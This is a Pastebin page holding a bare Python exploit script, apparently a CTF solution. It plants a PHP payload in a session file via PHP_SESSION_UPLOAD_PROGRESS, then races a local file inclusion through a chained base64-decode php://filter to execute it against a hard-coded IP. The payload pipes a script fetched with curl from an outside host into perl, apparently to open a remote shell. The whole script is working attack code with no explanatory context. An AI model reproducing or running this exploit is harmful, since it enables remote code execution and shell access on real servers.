daily pastebin goal
66%
SHARE
TWEET

Untitled

a guest Oct 21st, 2018 154 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import sys
  2. import string
  3. import requests
  4. from base64 import b64encode
  5. from random import sample, randint
  6. from multiprocessing.dummy import Pool as ThreadPool
  7.  
  8.  
  9.  
  10. HOST = 'http://54.250.246.238/'
  11. sess_name = 'iamorange'
  12.  
  13. headers = {
  14.     'Connection': 'close',
  15.     'Cookie': 'PHPSESSID=' + sess_name
  16. }
  17.  
  18. payload = '@<?php `curl orange.tw/w/bc.pl|perl -`;?>'
  19.  
  20.  
  21. while 1:
  22.     junk = ''.join(sample(string.ascii_letters, randint(8, 16)))
  23.     x = b64encode(payload + junk)
  24.     xx = b64encode(b64encode(payload + junk))
  25.     xxx = b64encode(b64encode(b64encode(payload + junk)))
  26.     if '=' not in x and '=' not in xx and '=' not in xxx:
  27.         print payload
  28.         break
  29.  
  30. def runner1(i):
  31.     data = {
  32.         'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + payload + 'Z'
  33.     }
  34.     while 1:
  35.         fp = open('/etc/passwd', 'rb')
  36.         r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
  37.         fp.close()
  38.  
  39. def runner2(i):
  40.     filename = '/var/lib/php/sessions/sess_' + sess_name
  41.     filename = 'php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s' % filename
  42.     # print filename
  43.     while 1:
  44.         url = '%s?orange=%s' % (HOST, filename)
  45.         r = requests.get(url, headers=headers)
  46.         c = r.content
  47.         if c and 'orange' not in c:
  48.             print [c]
  49.  
  50.  
  51. if sys.argv[1] == '1':
  52.     runner = runner1
  53. else:
  54.     runner = runner2
  55.  
  56. pool = ThreadPool(32)
  57. result = pool.map_async( runner, range(32) ).get(0xffff)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top